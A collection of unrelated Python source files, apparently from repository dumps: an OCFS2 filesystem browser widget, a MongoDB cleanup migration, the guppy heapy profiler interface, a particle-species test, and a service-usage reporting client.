self.add(self.scrl_win)
self.make_dentry_store()
self.make_file_view()
self.make_ls_fields()
self.connect('destroy', self.destroy_handler)
self.refresh()
def make_dentry_store(self):
def tree_compare(store, a, b):
d1 = self.get_dentry(store, a)
d2 = self.get_dentry(store, b)
if d1 is d2:
return 0
elif d1 is INVALID_DENTRY:
return 1
elif d2 is INVALID_DENTRY:
return -1
elif d1 and not d2:
return 1
elif not d1 and d2:
return -1
elif d1.file_type != d2.file_type:
if d1.file_type == ocfs2.FT_DIR:
return -1
elif d2.file_type == ocfs2.FT_DIR:
return 1
else:
return cmp(d1.name, d2.name)
else:
return cmp(d1.name, d2.name)
self.store = gtk.TreeStore(str, gobject.TYPE_PYOBJECT,
str, gobject.TYPE_BOOLEAN)
self.store.set_sort_func(COLUMN_NAME, tree_compare)
self.store.set_sort_column_id(COLUMN_NAME, gtk.SORT_ASCENDING)
def make_file_view(self):
tv = gtk.TreeView(self.store)
self.scrl_win.add(tv)
set_props(tv, headers_visible=False)
column = gtk.TreeViewColumn()
renderer = gtk.CellRendererPixbuf()
column.pack_start(renderer, expand=False)
column.set_attributes(renderer, stock_id=COLUMN_ICON)
renderer = gtk.CellRendererText()
renderer.set_property('style', pango.STYLE_ITALIC)
column.pack_start(renderer, expand=True)
column.set_attributes(renderer, text=COLUMN_NAME,
style_set=COLUMN_ITALIC)
tv.append_column(column)
tv.connect('test_expand_row', self.tree_expand_row)
tv.connect('test_collapse_row', self.tree_collapse_row)
sel = tv.get_selection()
sel.connect('changed', self.select_dentry)
def make_ls_fields(self):
table = gtk.Table(rows=2, columns=7)
set_props(table, row_spacing=4,
column_spacing=4,
border_width=4)
self.pack_end(table, expand=False, fill=False)
self.info_labels = []
for column, field in enumerate(fields):
label = gtk.Label(field.label)
if field.right_justify:
set_props(label, xalign=1.0)
else:
set_props(label, xalign=0.0)
xoptions = yoptions = gtk.FILL
xpadding = 2
table.attach(label, column, column + 1, 0, 1,
xoptions, yoptions, xpadding)
label = InfoLabel(field)
table.attach(label, column, column + 1, 1, 2,
xoptions, yoptions, xpadding)
self.info_labels.append(label)
def destroy_handler(self, obj):
self.cleanup()
def make_dentry_node(self, dentry, stock_id, parent=None):
return self.store.append(parent, (dentry.name, dentry, stock_id, False))
def make_file_node(self, dentry, parent=None):
self.make_dentry_node(dentry, STOCK_FILE, parent)
def make_dir_node(self, dentry, parent=None):
iter = self.make_dentry_node(dentry, STOCK_DIRECTORY, parent)
self.store.append(iter, ('.', dentry, None, False))
def make_loading_node(self, parent=None):
self.store.append(parent, ('Loading...', None, STOCK_LOADING, True))
def make_empty_node(self, parent=None):
self.store.append(parent, ('Empty', None, STOCK_EMPTY, True))
def make_error_node(self, parent=None):
self.store.append(parent, ('Error', INVALID_DENTRY, STOCK_ERROR, True))
def cleanup(self):
if hasattr(self, 'levels'):
for level in self.levels:
level.destroy()
self.levels = []
def refresh(self):
self.cleanup()
self.store.clear()
self.fs = None
if self.device:
try:
self.fs = ocfs2.Filesystem(self.device)
except ocfs2.error:
self.make_error_node()
if self.fs:
self.add_level()
else:
self.make_empty_node()
def add_level(self, dentry=None, parent=None):
if parent:
iter = self.store.iter_children(parent)
name = self.store[iter][COLUMN_NAME]
if name != '.':
return
del self.store[iter]
try:
diriter = self.fs.iterdir(dentry)
except ocfs2.error:
self.make_error_node(parent)
return
self.make_loading_node(parent)
level = TreeLevel(diriter, dentry, parent)
self.levels.append(level)
if parent:
self.store[parent][COLUMN_INFO_OBJECT] = level
level.set_callback(self.populate_level, level)
level.attach()
def populate_level(self, level):
try:
dentry = level.diriter.next()
except (StopIteration, ocfs2.error), e:
self.destroy_level(level, isinstance(e, ocfs2.error))
return False
if dentry.file_type == ocfs2.FT_DIR:
self.make_dir_node(dentry, level.parent)
else:
self.make_file_node(dentry, level.parent)
return True
def destroy_level(self, level, error=False):
if error:
self.make_error_node(level.parent)
else:
children = self.store.iter_n_children(level.parent)
if children < 2:
self.make_empty_node(level.parent)
if level.parent:
self.store[level.parent][COLUMN_INFO_OBJECT] = level.dentry
# Argh, ancient pygtk can't handle None being passed to
# iter_children
iter = self.store.iter_children(level.parent)
else:
iter = self.store.get_iter_first()
self.store.remove(iter)
self.levels.remove(level)
del level.diriter
def tree_expand_row(self, tv, iter, path):
info_obj = self.store[iter][COLUMN_INFO_OBJECT]
if isinstance(info_obj, TreeLevel):
level.collapsed = False
level.foreground(level)
else:
self.add_level(info_obj, iter)
def tree_collapse_row(self, tv, iter, path):
info_obj = self.store[iter][COLUMN_INFO_OBJECT]
if isinstance(info_obj, TreeLevel):
level = info_obj
level.collapsed = True
level.background()
def select_dentry(self, sel):
store, iter = sel.get_selected()
if store and iter:
dentry = self.get_dentry(store, iter)
else:
dentry = None
if dentry:
self.display_dentry(dentry)
else:
self.display_clear()
if iter:
iter = store.iter_parent(iter)
self.path_label.set_text(self.get_fs_path(store, iter))
def display_dentry(self, dentry):
dinode = self.fs.read_cached_inode(dentry.inode)
for label in self.info_labels:
label.update(dentry, dinode)
def display_clear(self):
for label in self.info_labels:
label.clear()
def get_dentry(self, store, iter):
info_obj = store[iter][COLUMN_INFO_OBJECT]
if isinstance(info_obj, ocfs2.DirEntry):
return info_obj
elif isinstance(info_obj, TreeLevel):
return info_obj.dentry
else:
return None
def get_fs_path(self, store, iter):
parts = []
while iter:
dentry = self.get_dentry(store, iter)
parts.append(dentry.name)
iter = store.iter_parent(iter)
parts.reverse()
return '/' + '/'.join(parts)
class TreeLevel(IdleBase):
def __init__(self, diriter, dentry=None, parent=None):
IdleBase.__init__(self)
self.diriter = diriter
self.dentry = dentry
if parent:
self.parent = parent.copy()
else:
self.parent = None
self.collapsed = False
def foreground(self):
if not self.collapsed:
self.priority = gobject.PRIORITY_DEFAULT_IDLE
def background(self):
self.priority = gobject.PRIORITY_LOW
def main():
import sys
def dummy(*args):
gtk.main_quit()
window = gtk.Window()
window.set_default_size(400, 300)
window.connect('delete_event', dummy)
browser = Browser(sys.argv[1])
window.add(browser)
window.show_all()
gtk.main()
if __name__ == '__main__':
main()
|
rageandqq/rmc
|
refs/heads/master
|
migrations/delete_non_existing_course_user_courses.py
|
8
|
import rmc.models as m
import rmc.shared.constants as c
import mongoengine as me
def delete_non_existing_course_user_courses():
"""
NOTE: Do not run this yet, as it seems from dry run that there are
some usercourses that we would be deleting that are legit courses
that we should try getting into our Course collection.
Delete UserCourse models that reference Course objects we dont' have
(e.g. wkrpt100)"""
for uc in m.UserCourse.objects:
if not m.Course.objects.with_id(uc.course_id):
print 'deleting: %s, %s, %s' % (
uc.user_id, uc.course_id, uc.term_id)
uc.delete()
if __name__ == '__main__':
me.connect(c.MONGO_DB_RMC)
delete_non_existing_course_user_courses()
|
yoer/hue
|
refs/heads/master
|
desktop/core/ext-py/guppy-0.1.10/guppy/heapy/Use.py
|
37
|
#._cv_part guppy.heapy.Use
import guppy.etc.Glue
class _GLUECLAMP_(guppy.etc.Glue.Interface):
_preload_ = '_hiding_tag_',
_chgable_ = ('reprefix', 'default_reprefix', 'gcobjs',
'relheap', 'relheapg', 'relheapu', '__doc__')
_dir_ = (
'Anything', 'Class', 'Clodo', 'Id', 'Idset', 'Module',
'Nothing', 'Rcs', 'Root', 'Size', 'Type', 'Unity',
'Via', 'doc', 'findex', 'heap', 'heapu',
'idset','iso', 'load', 'monitor', 'pb',
'setref', 'test')
_private_ = ('View','_hiding_tag_','_load_stat','ctime','default_reprefix',
'dumph','gcobjs','heapg','loadc','relheap','relheapg',
'relheapu','reprefix','setrelheap','setrelheapg',
'setrelheapu','tc_adapt','tc_repr','union',
'uniset_from_setcsatable','warnings','Stat'
)
default_reprefix = 'hpy().'
def _get_gcobjs(self):
return self.Nothing
def _get_relheap(self):
return self.Nothing
def _get_relheapg(self):
return self.Nothing
def _get_relheapu(self):
return self.Nothing
def _get_reprefix(self):
# The name that this instance (or one with the same ._share)
# has in the __main__ module, if any, or self.default_reprname otherwise.
# Used for prefixing the result of repr() of various objects
# so it becomes possible to evaluate it in a typical environment.
import __main__
for k, v in __main__.__dict__.items():
if (isinstance(v, self.__class__) and
getattr(v, '_share', None) is self._share):
return '%s.'%k
return self.default_reprefix
def _get_Root(self):
"""Root: RootStateType
This attribute is a symbolic root containing attributes from which all
reachable objects in the heap can be reached. It is the only value (a
singleton) of its kind; see [1] for a description of its attributes.
References
[0] heapy_Use.html#heapykinds.Use.Root
[1] heapy_RootState.html#heapykinds.RootStateType"""
return self.View.heapyc.RootState
def __repr__(self):
return """\
Top level interface to Heapy.
Use eg: %sdoc for more info on %s.""" %(
self.reprefix,self.reprefix[:-1])
__str__=__repr__
def Ddir(self, opts=''):
"""\
#OBSOLETE
$HP.dir(opts: str+])-> GuppyDir
$HP.dir(opts: str+]).<attribute> -> GuppyDoc
A replacement for the builtin function dir(), providing a listing of
public attributes for Heapy objects. It also has an attribute for each
item in the listing, for example:
>>> $HP.dir().heap
returns a GuppyDoc object providing documentation for the heap
method. The method also takes a string argument specifying further
options. Currently the following are provided:
'l' Generate a listing of the synopsis lines.
'L' Generate a listing of the entire doc strings."""
obj = self
return self._root.guppy.etc.Help.dir(obj, opts)
def _get_doc(self):
"""Overview documentation for top level Heapy object.
Provides a listing of the available attributes.
Accessing the attribute name on the doc objects gives further info, eg:
>>> hp.doc.heap
gives doc for the heap method when hp is the top level Heapy object.
References may be embedded in the documentations. To access a
reference, opening up a web browser with the doc for it one can do eg:
>>> hp.doc.heap[1]
The reference number 0 is special. If it is provided, it is the
reference to the html doc for the described object itself. So to see
in the web browser the doc for the heap method one can do:
>>> hp.doc.heap[0]
References
[0] heapy_Use.html#heapykinds.Use.doc"""
return self._root.guppy.etc.Help.dir(self,
header="""\
Top level interface to Heapy. Available attributes:""",
footer="""\
Use eg: %sdoc.<attribute> for info on <attribute>."""%self.reprefix)
def heapg(self, rma=1):
""" DEPRECATED """
self.warnings.warn(
"Method Use.heapg is depreciated, it doesn't work well. Use heapu instead.")
h = self.View.heapg(rma)
h -= self.relheapg
return h
def heapu(self, rma=1, abs=0, stat=1):
"""heapu() -> Stat
Finds the objects in the heap that remain after garbage collection but
are _not_ reachable from the root. This can be used to find objects
in extension modules that remain in memory even though they are
gc-collectable and not reachable.
Returns an object containing a statistical summary of the objects
found - not the objects themselves. This is to avoid making the
objects reachable.
See also: setref[1]
References
[0] heapy_Use.html#heapykinds.Use.heapu
[1] heapy_Use.html#heapykinds.Use.setref"""
h = self.View.heapu(rma)
rel = 0
if not abs and self.relheapu and isinstance(self.relheapu, type(h)):
h -= self.relheapu
rel = 1
if stat:
h = h.stat
if not abs and self.relheapu and isinstance(self.relheapu, type(h)):
h -= self.relheapu
rel = 1
h.firstheader = 'Data from unreachable objects'
if rel:
h.firstheader += ' relative to: %s'%\
self.ctime(self.relheapu.timemade)
h.firstheader += '.\n'
return h
def heap(self):
"""heap() -> IdentitySet[1]
Traverse the heap from a root to find all reachable and visible
objects. The objects that belong to a heapy instance are normally not
included. Return an IdentitySet with the objects found, which is
presented as a table partitioned according to a default equivalence
relation (Clodo [3]).
See also: setref[2]
References
[0] heapy_Use.html#heapykinds.Use.heap
[1] heapy_UniSet.html#heapykinds.IdentitySet
[2] heapy_Use.html#heapykinds.Use.setref
[3] heapy_Use.html#heapykinds.Use.Clodo"""
h = self.View.heap()
h |= self.gcobjs
h -= self.relheap
return h
def load(self, fn, use_readline=0):
"""\
load(alt:[fn: loadablefilenamestring+ or
fn: loadableiterableofstrings+]
[use_readline = boolean+]) -> Stat
Load heapy-related data from a serialized form. Currently it handles
data generated by Stat.dump.
Arguments
fn: loadablefilenamestring+
A string argument is treated as a file name.
fn: loadableiterableofstrings+
An open file or an iterator will be iterated over enough
to read one package of data, and another call to load
will read the next package.
use_readline = boolean+
If true, the method will use .readline() instead of
iteration, which may be necessary in case the input
comes from a pipe since otherwise the Python runtime
would try to read ahead a big block before returning the
first package of data.
Returns
one package of statistical data.
References
[0] heapy_Use.html#heapykinds.Use.load"""
if isinstance(fn, basestring):
# We got a filename.
# I want to read only what is being requested
# so I can look quickly at some lines of a long table.
# (There are seemingly easier ways to do this
# but this takes care of some tricky details.
# Keeping f open avoids it to be overwritten
# (at least by Stat.dump() and if OS=Linux)
# if data are written to a new file with the same name.)
f = open(fn)
def get_trows():
pos = 0
while 1:
f.seek(pos)
line = f.readline()
if not line:
break
pos = f.tell()
yield line
elif hasattr(fn, '__iter__') and not hasattr(fn, 'next'):
# We got a sequence, that is not an iterator. Use it directly.
def get_trows():
return fn
elif hasattr(fn, 'next'):
# We got an iterator or file object.
# We 'have' to read all lines (at once)-
# to update the read position -
# to mimic 'pickle' semantics if several
# objects are stored in the same file.
# We can't use .next always - (eg not on pipes)
# it makes a big readahead (regardless of buffering setting).
# But since .next() (typically) is much faster, we use it
# per default unless use_readline is set.
if use_readline:
get_line = fn.readline
else:
get_line = fn.next
trows = []
line = get_line()
if not line:
raise StopIteration
endline = '.end: %s'%line
try:
while line:
trows.append(line)
if line == endline:
break
line = get_line()
else:
raise StopIteration
except StopIteration:
trows.append(endline)
def get_trows():
return trows
else:
raise TypeError, 'Argument should be a string, file or an iterable yielding strings.'
a = iter(get_trows()).next()
if not a.startswith('.loader:'):
raise ValueError, 'Format error in %r: no initial .loader directive.'%fn
loader = a[a.index(':')+1:].strip()
try:
loader = getattr(self, loader)
except AttributeError:
raise ValueError, 'Format error in %r: no such loader: %r.'%(fn, loader)
return loader(get_trows)
def loadall(self,f):
''' Generates all objects from an open file f or a file named f'''
if isinstance(f,basestring):
f=open(f)
while True:
yield self.load(f)
def loadc(self, fn):
f = open(fn, 'r', 1)
while 1:
print self.load(f, use_readline=1)
def dumph(self, fn):
f = open(fn, 'w')
import gc
while 1:
x = self.heap()
x.stat.dump(f)
f.flush()
print len(gc.get_objects())
def setref(self, reachable=None, unreachable=None):
"""setref()
Set a reference point for heap usage measurement. This applies to
both the heap[1] and heapu[2] methods. The heap() method will only
show the objects allocated after the time setref was called. The
heapu() method, since it deals with summary data and not actual
objects, will show the difference of sizes and counts compared to when
setref was called.
References
[0] heapy_Use.html#heapykinds.Use.setref
[1] heapy_Use.html#heapykinds.Use.heap
[2] heapy_Use.html#heapykinds.Use.heapu"""
if reachable is None and unreachable is None:
self.setrelheap()
self.setrelheapu()
else:
if reachable is not None:
self.setrelheap(reachable)
if unreachable is not None:
self.setrelheapu(unreachable)
def setrelheap(self, reference=None):
if reference is None:
reference = self.View.heap()
self.relheap = reference
def setrelheapg(self, reference=None):
self.warnings.warn(
"Method Use.setrelheapg is depreciated, use setref instead.")
if reference is None:
self.relheapg = None
reference = self.View.heapg()
self.relheapg = reference
def setrelheapu(self, reference=None,stat=1):
if reference is None:
self.relheapu = None
reference = self.heapu(abs=True, stat=stat)
if stat and not isinstance(reference, self.Stat):
reference = reference.stat
self.relheapu = reference
def test(self, debug=False):
"""test([debug: bool+ = False])
Run the Heapy test suite.
Argument
debug
If True, the tests will be run in debug mode so the stack frame
can be examined with pdb.pm() after the first exception."""
self._parent.test.test_all.test_main(debug)
_imports_ = (
'_parent.Classifiers:Class',
'_parent.Classifiers:Clodo',
'_parent.Classifiers:Id',
'_parent.Classifiers:Idset',
'_parent.Classifiers:Module',
'_parent.Classifiers:Rcs',
'_parent.Classifiers:Size',
'_parent.Classifiers:Type',
'_parent.Classifiers:Unity',
'_parent.Classifiers:Via',
'_parent.Classifiers:findex',
'_parent.Classifiers:sonokind',
'_parent.Classifiers:tc_adapt',
'_parent.Classifiers:tc_repr',
'_parent.Monitor:monitor',
'_parent.Part:_load_stat',
'_parent.Part:Stat',
'_parent.Prof:pb',
'_parent.UniSet:Anything',
'_parent.UniSet:idset',
'_parent.UniSet:iso',
'_parent.UniSet:Nothing',
'_parent.UniSet:union',
'_parent.UniSet:uniset_from_setcastable',
'_parent:View',
'_parent.View:_hiding_tag_',
'_root.time:ctime',
'_root:warnings',
)
_doc_Anything = """Anything: Kind
A symbolic set that represents all possible Python objects.
References
[0] heapy_Use.html#heapykinds.Use.Anything"""
_doc_Class ="""Class:EquivalenceRelation
Class(tc:typeorclass+) -> Kind
Equivalence relation by class. It defines objects to be equivalent
when their builtin __class__ attributes are identical. When called it
returns the equivalenc class defined by the argument:
tc: A type or class that the returned kind should represent.
References
[0] heapy_Use.html#heapykinds.Use.Class"""
_doc_Clodo ="""Clodo:EquivalenceRelation
Clodo(alt:[tc: typeorclassexceptdict+ or dictof =
typeorclassoremptytuple+]) -> Kind
Equivalence relation by class or dict owner. It distinguishes between
objects based on their class just like the Class relation, and in
addition distinguishes between dicts depending on what class they are
'owned' by, i.e. occur in __dict__ attribute of.
When called it returns the equivalence class defined by the argument,
EITHER:
tc: A positional argument, a type or class but not a dict, to
create the corresponding equivalence class.
OR:
dictof: A named argument, to create an equivalence class
consisting of all dicts that are owned by objects of the type
or class specified in the argument; or dicts with no owner if
an empty tuple is given. XXX express this simpler&better...
References
[0] heapy_Use.html#heapykinds.Use.Clodo"""
_doc_Id="""Id:EquivalenceRelation
Id(address: objectaddress+) -> Kind)
This equivalence relation defines objects to be equivalent only if
they are identical, i.e. have the same address. When called it returns
the equivalence class defined by the argument:
address: The memory address of an object.
References
[0] heapy_Use.html#heapykinds.Use.Id"""
_doc_Idset="""Id:EquivalenceRelation
Idset(node: Anything+) -> IdentitySet
This equivalence relation defines objects to be equivalent only if
they are identical, i.e. have the same address. When called it returns
the equivalence class defined by the argument:
node: Anything+
Any object is a valid argument.
Note
This is mainly for special purpose internal use. The Id
equivalence relation is more efficient when partitioning large
sets."""
_doc_Module = """Module:EquivalenceRelation
x.Module( draw:[name = modulename+ , at = moduleaddress+]) -> Kind
This equivalence relation defines objects to be equivalent if they are
the same module, or if none of them is a module. Partitioning a set
of objects using this equivalence relation will therefore result in
one singleton set for each module and one set containing all other
objects.
Calling the Module equivalence relation creates a Kind containing the
module given in the keyword argument(s). Either the name, address or
both may be specified. If no argument is specified the equivalence
class is that of non-module objects.
References
[0] heapy_Use.html#heapykinds.Use.Module"""
_doc_Nothing = """Nothing: IdentitySet
The empty set.
References
[0] heapy_Use.html#heapykinds.Use.Nothing"""
_doc_Rcs = """Rcs: EquivalenceRelation
Rcs ( 0..*: alt:[kind: Kind+ or sok: SetOfKind+]) -> KindOfRetClaSetFamily
(Referrer classification set.)
In this equivalence relation, objects are classified by classifying
their referrers, using the Clodo equivalence relation. These
classifications are collected in a set, representing the
classification of the object.
Calling Rcs creates an equivalence class from specified set of
referrer classifications. The arguments specify a set of Kind objects,
each of which representing an equivalence class of Clodo.
kind: Kind+
This adds a single Kind to the set of Kinds of referrers.
sok: SetOfKind+
This adds each Kind in the sok argument to the total set of
Kinds of referrers.
References
[0] heapy_Use.html#heapykinds.Use.Rcs"""
_doc_Size = """\
Size: EquivalenceRelation
Size(size: notnegative+) -> KindOfSizeFamily[1])
In this equivalence relation, objects are classified by memory size,
so each equivalence class represents a particular size of object.
References
[0] heapy_Use.html#heapykinds.Use.Size
[1] heapy_UniSet.html#heapykinds.KindOfSizeFamily"""
_doc_Type = """Type: EquivalenceRelation
Type(type: type+) -> KindOfTypeFamily[1]
In this equivalence relation, objects are classified by type so each
equivalence class represents objects of a particular type. Calling it
creates a Kind representing the type specified in the argument:
type: type+
A Python type object or a representation of it.
References
[0] heapy_Use.html#heapykinds.Use.Type
[1] heapy_UniSet.html#heapykinds.KindOfTypeFamily"""
_doc_Unity = """Unity: EquivalenceRelation
Unity() -> Kind[1]
In this equivalence relation, all objects are considered equivalent.
There is only one equivalence class, that is, Anything[2].
References
[0] heapy_Use.html#heapykinds.Use.Unity
[1] heapy_UniSet.html#heapykinds.Kind
[2] heapy_Use.html#heapykinds.Use.Anything"""
_doc_Via = """Via: EquivalenceRelation
Via( 0..*:rel: relationname+) -> KindOfInViaFamily[1]
In this equivalence relation, objects are classified by how they are
referred from their referrers, so each equivalence class represents
objects that have a particular set of relations to their referrers.
Calling it creates a Kind representing the set of referrers specified
by the argument:
rel: relationname+
Each argument specifies one referrer relation. The arguments
should be strings and can be of any of the following forms.
[expression]
Indexing of a dict, list, tuple (etc). The expression must be a
Python expression that can be evaluated in a local
environment. The environment will contain the builtins and a name
'hp' that is bound to the current Use instance.
.attribute
Getting an attribute from a builtin type or a slot of a slotted
type. (I.E. not an attribute that is in a dict of an object.)
.f_locals["name"]
A local variable of a frame.
.f_locals ["name"]
A variable in a CELL of a frame. Note the space between f_locals and
[. This is to distinguish it from ordinary locals, and still use a
syntax that could be used to access those variables directly from
Python.
.keys()[integer]
A key in a dictionary, at the indicated place in its keys().
References
[0] heapy_Use.html#heapykinds.Use.Via
[1] heapy_UniSet.html#heapykinds.KindOfInViaFamily"""
_doc_findex = """
findex( 0..*:kind: Kind+) -> (
Subkind of: EquivalenceRelation[1]
callable: (index: notnegative+)
Calling the returned equivalence relation creates an
equivalence class.
Argument
index: notnegative+
The position of the matching kind in the sequence of
kinds. The first one has index 0. Specifying the
length of the sequence means that the equivalence
class returned is the one where none of the kinds in
the sequence matched.
)
Create an equivalence relation based on a sequence of kinds. The
name is a combination of find and index. The classification of
each objects is done as follows:
For each kind in the sequence, check whether the object is an
element of that kind. If it is, the classification is the index
of that kind in the sequence. If the end of the sequence is
reached, the classification is the length of the sequence.
Argument
kind: Kind+
Each argument specifies the kind in that position in the
sequence.
Bugs
Though the Kind objects representing the equivalence classes
work with set operations such as intersection and union, the
tests such as subset and equality do not generally give the
expected result.
References
[0] heapy_Use.html#heapykinds.Use.findex
[1] heapy_UniSet.html#heapykinds.EquivalenceRelation"""
_doc_idset = """idset(nodes: iterable+) -> IdentitySet[1]
Create a set of objects based on identity.
Argument
nodes: iterable+
The argument must be an iterable and may yield any kind
of objects.
Note
This method is the same as iso except for the argument.
References
[0] heapy_Use.html#heapykinds.Use.idset
[1] heapy_UniSet.html#heapykinds.IdentitySet"""
_doc_iso = """iso( 0..*:node: Any+) -> IdentitySet[1]
Create a set of objects based on identity.
Argument
node: Any+
Any kind of objects are valid arguments.
Note
This method is the same as idset[2] except for the argument.
References
[0] heapy_Use.html#heapykinds.Use.iso
[1] heapy_UniSet.html#heapykinds.IdentitySet
[2] heapy_Use.html#heapykinds.Use.idset"""
_doc_sokind = """
"""
|
jbernhard/frzout
|
refs/heads/master
|
frzout/test/test_species.py
|
1
|
# -*- coding: utf-8 -*-
from ..species import species_dict, _nth_digit, _normalize_species
def test_species():
num = 9876543210
assert [_nth_digit(num, n) for n in range(10)] == list(range(10)), \
'Incorrect digits extracted from {}'.format(num)
num = 7492
assert [_nth_digit(num, n) for n in range(5, -1, -1)] == \
[0, 0, 7, 4, 9, 2], \
'Incorrect digits extracted from {}'.format(num)
assert all(i > 100 for i in species_dict), \
'Elementary particles in species data.'
assert len(set(species_dict)) == len(species_dict), \
'Duplicates in species data.'
pion_data = species_dict[211]
assert pion_data['name'] == 'pi', \
'Incorrect pion name.'
assert abs(pion_data['mass'] - .13957061) < 1e-15, \
'Incorrect pion mass.'
assert pion_data['has_anti'], \
'The pi+ has an antiparticle.'
assert pion_data['charge'] == 1, \
'The pi+ has +1 charge.'
assert pion_data['boson'], \
'The pion is a boson.'
assert not species_dict[111]['has_anti'], \
'The pi0 does not have an antiparticle.'
assert species_dict[311]['has_anti'], \
'The K0 has an antiparticle.'
assert not species_dict[2212]['boson'], \
'The proton is a fermion.'
assert 'mass_range' not in species_dict[211], \
'The pion is stable.'
assert 'mass_range' in species_dict[213], \
'The rho is unstable.'
assert abs(species_dict[213]['mass_range'][0] - .28) < 1e-12, \
'The rho mass threshold is two pions.'
assert all(
i['mass_range'][0] >= .28
for i in species_dict.values() if 'mass_range' in i
), 'The lightest decay product is two pions.'
normalized = _normalize_species()
assert len(normalized) == sum(
2 if info['has_anti'] else 1 for info in species_dict.values()
), 'Incorrect number of normalized species.'
assert normalized[0][0] == 111, \
'First normalized species should be the pi0.'
assert normalized[1][0] == -normalized[2][0] == 211, \
'Second and third normalized species should be the pi+/-.'
assert normalized[1][1] is normalized[2][1], \
'pi+/- should share the same info dict.'
normalized_id = _normalize_species('id')
assert [i[0] for i in normalized_id] == [
211, -211, 321, -321, 2212, -2212
], 'Incorrect normalized species IDs.'
test_ID = 2112
test_info = species_dict[test_ID]
assert _normalize_species([test_ID]) == [
(test_ID, test_info),
(-test_ID, test_info)
], 'Incorrect custom normalized species.'
|
eResearchSA/reporting-unified
|
refs/heads/master
|
usage/types.py
|
1
|
import json
import logging
import requests
import concurrent.futures
from urllib.parse import urlencode
from abc import ABCMeta, abstractmethod
from unified.models import nova, hpc
from utils import array_to_dict
logger = logging.getLogger(__name__)
class NotFoundError(Exception):
pass
class Client(object):
"""RESTful APIs' client"""
def __init__(self, url, token=None):
self.end_point = url
self.headers = None
if token:
self.headers = {'x-ersa-auth-token': token}
def group(self, ids, size=10):
"""Slice uuids into managable chunks for optimising request performance"""
return [ids[i:i + size] for i in range(0, len(ids), size)]
def _verify(self, rst):
"""Check the response for verifying existence"""
if rst.status_code < 300:
return True
else:
logger.error("Request to %s failed. HTTP error code = %d" % (self.end_point, rst.status_code))
return False
def get(self, path='', args={}):
url = self.end_point + path
query_string = urlencode(args)
url = url + '?' + query_string if query_string else url
logger.debug(url)
req = requests.get(url, headers=self.headers)
if self._verify(req):
j = req.json()
logger.debug(j)
return j
return None
class BmanClient(Client):
"""Client of Bman"""
def __init__(self, url, token=None):
super().__init__(url, token)
self.organisations = {} # cache for any organisation(account) name
self.top_orgs = [org['id'] for org in self.get('/organisation/', {'method': 'get_tops'})]
def get_parent_org_ids(self, role_id):
"""Gets the organisation names of a role"""
# FIXME: Bman for MS Dynamics does not support this feature 20170428
# A role only has the lowest organisation, for grouping, it needs
# to be expanded into a full list
# parents can be more han one at the same level
orgs = []
role = self.get('/role/%d/' % role_id)
if role:
parent_org_ids = self.get('/organisation/%d/get_parent_ids/' % role['organisation'])
if parent_org_ids:
orgs = parent_org_ids
orgs.append(role['organisation'])
else:
orgs = [role['organisation']]
return orgs
def get_org_name(self, org_id):
# TODO: Bman for MS Dynamics does not support this query yet 20170428
name = ''
if org_id in self.organisations:
name = self.organisations[org_id]
else:
org = self.get('/organisation/%d/' % org_id)
if org:
name = self.organisations[org_id] = org['name']
return name
def get_org_names(self, org_ids):
names = []
for org_id in org_ids:
names.append(self.get_org_name(org_id))
return names
def get_managing_org_names(self, role_id, billing_org_id=None):
"""
Gets names of managing organisations of a role
As service can be billed differently to the associated organisation,
use billing_org_id to make sure for billing purpose, managing
organisations are correct.
"""
# FIXME: This may not be needed for Dynamics as there is no need to get managing org by manager role as for Bman
names = []
parent_org_ids = self.get_parent_org_ids(role_id)
if parent_org_ids:
top_count = sum([1 for org_id in parent_org_ids if org_id in self.top_orgs])
if billing_org_id:
names = [self.get_org_name(billing_org_id)]
if top_count == 1 and billing_org_id in parent_org_ids:
# valid fully expanded organisation chain
names = self.get_org_names(parent_org_ids)
else:
# this cloud be less accurate as there may be more than one top organisation
names = self.get_org_names(parent_org_ids)
return names
class Usage(metaclass=ABCMeta):
"""Abstract class of calculating usage of a service in a time period"""
# Derived classes cross-reference BMAN for classifiers:
# university and school. If none of them found, manager field
# is an empty list.
def __init__(self, start, end, **kwargs):
# conditions are used to define how to prepare data
# source, model.
# Derived classes may have their own set up conditions:
# usage model, prices(?), etc
self.start_timestamp = start
self.end_timestamp = end
logger.debug("Query arguments: start=%s, end=%s" % (self.start_timestamp, self.end_timestamp))
# useage_meta is a dict with keys of the values of usage data's identifier:
# for NECTAR, it is OpenstackID, HPC, it is owner
self.usage_meta = None
@abstractmethod
def prepare(self):
"""Gets data from source, do other preparations
It should returns manager_field
"""
pass
def _get_managing_orgs_of(self, identifier, unit_name='managerunit'):
"""Override parent class method as the usage meta is not from Orders"""
managing_orgs = []
if identifier in self.usage_meta:
managing_orgs = [self.usage_meta[identifier]['biller']]
if unit_name in self.usage_meta[identifier]:
managing_orgs.append(self.usage_meta[identifier][unit_name])
return managing_orgs
def _get_managing_orgs(self, identifiers):
"""Gets names of managing organisation of identifiers.
identifiers: a list with unique values which will be used by checker
getter: a function to get the names
"""
managers = {}
for ident in identifiers:
try:
managers[ident] = self._get_managing_orgs_of(ident)
except NotFoundError:
logger.warning('Cannot retrieve organisation information for identifier %s' % ident)
managers[ident] = []
except Exception:
managers[ident] = []
logger.exception('Cannot retrieve organisation information for identifier %s' % ident)
return managers
def save(self, data):
"""Saves data into a JSON file named as ServiceUsage_StartTimestamp_EndTimestamp.json"""
file_name = '%s_%d_%d.json' % (self.__class__.__name__, self.start_timestamp, self.end_timestamp)
with open(file_name, 'w') as jf:
json.dump(data, jf)
return file_name
def calculate(self):
# Get data by calling prepare and inserting manager field with managing organisations
items, manager_field = self.prepare()
logger.debug('%d data has been returned by prepare. manager_field is %s' % (len(items), manager_field))
# managers is the short of managing organisations: always biller and managerunit (school)
# person manager is not included on 20170428.
managers = self._get_managing_orgs(set(item[manager_field] for item in items))
for item in items:
item['manager'] = managers[item[manager_field]]
return self.save(items)
class NovaUsage(Usage):
"""Calculates Nova usage (states) in a time period."""
def __init__(self, start, end, crm_client, workers=1):
super().__init__(start, end)
self.crm_client = crm_client
# usage_meta is a dict which has OpenstackID as key and all other information of a product (Nectar Allocation)
self.usage_meta = array_to_dict(self.crm_client.get('/v2/contract/nectarcloudvm/'), 'OpenstackID')
self.concurrent_workers = workers
def _get_state(self, instance_id):
instance = nova.Instance.query.get(instance_id)
return instance.latest_state(self.start_timestamp, self.end_timestamp)
def prepare(self):
q = nova.Summary(self.start_timestamp, self.end_timestamp)
ids = q.value()
logger.debug("Total number of instances = %d" % len(ids))
if len(ids):
with concurrent.futures.ThreadPoolExecutor(max_workers=self.concurrent_workers) as executor:
fs = {executor.submit(self._get_state, instance_id):
instance_id for instance_id in ids}
